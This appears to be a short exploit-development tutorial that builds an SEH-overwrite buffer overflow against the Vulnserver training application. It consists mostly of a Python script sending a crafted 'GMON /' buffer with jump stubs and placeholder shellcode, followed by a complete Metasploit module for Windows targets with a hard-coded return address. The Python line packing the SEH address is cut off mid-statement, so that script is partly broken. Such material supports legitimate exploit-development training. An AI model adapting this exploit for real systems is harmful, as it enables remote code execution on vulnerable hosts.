Pre-requisites : http://resources.infosecinstitute.com/seh-exploit/
Coerelan template : http://resources.infosecinstitute.com/stack-based-buffer-overflow-tutorial-part-1-%E2%80%94-introduction/
Re-freshers of the SEH exploit
Now onto the python code 🙂
import sys import struct import socket shellcode=("\xCC\xCC\xCC") #use your own Shellcode bad chars \x00\x0A\x0D sehp = "\xEB\x0F\x90\x90"; # JMP 0F(15), NOP, NOP (POINTER TO NEXT SEH RECORD) seho = struct.pack(' longjump = "\x59\xFE\xCD\xFE\xCD\xFE\xCD\xFF\xE1\xE8\xF2\xFF\xFF\xFF" # JMP back 768 bytes buffer= "\x90" * 2752 + "\x90" * 32 + shellcode + "\x90" * (714 - len(shellcode)) + sehp + seho + longjump + "D" *480 #makenops 2752 + 32 = 2784 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('127.0.0.1',9999)) data=s.recv(1024) s.send('GMON /' + buffer) s.close()
This makes the metasploit exploit
# Metasploit template from corelan.be # SEH for vunserver thegreycorner.com require 'msf/core' class Metasploit3 < Msf::Exploit::Remote # A remote exploit include Msf::Exploit::Remote::Tcp # using TCP connection def initialize(info = {}) super(update_info(info, 'Name' => 'Vunserver SEH exploit', 'Description' => %q{ This module exploits an SEH exploit in vulnserver. }, 'Author' => [ 'Stephen Bradshaw','Duncan Winfrey' ], 'Version' => '$Revision: 9999 $', 'References' => [ [ 'Vunserver', 'http://www.thegreycorner.com/p/vulnserver.html' ], [ 'corelan.be', 'http://tinyurl.com/64s3je4' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 500, 'BadChars' => "\x00\x0a\x0d", }, 'Platform' => 'win', 'Targets' => [ ['Windows NT/2000/XP/2003 ', { 'Ret' => 0x625010b4,} ], ], 'DefaultTarget' => 0, 'Privileged' => false )) register_options( [ Opt::RPORT(9999) ], self.class) end def exploit connect request = 'GMON /' request << rand_text_alpha_upper(2752) request << make_nops(32) request << payload.encoded request << rand_text_alpha_upper((714 - payload.encoded.length)) request << "\xEB\x0F\x90\x90" # Short Jump request << [target.ret].pack('V') # SEH Overwrite request << "\x59\xFE\xCD\xFE\xCD\xFE\xCD\xFF\xE1\xE8\xF2\xFF\xFF\xFF" # go back 768 bytes request << rand_text_alpha_upper(480) # junk sock.put(request) handler disconnect end
The working module 🙂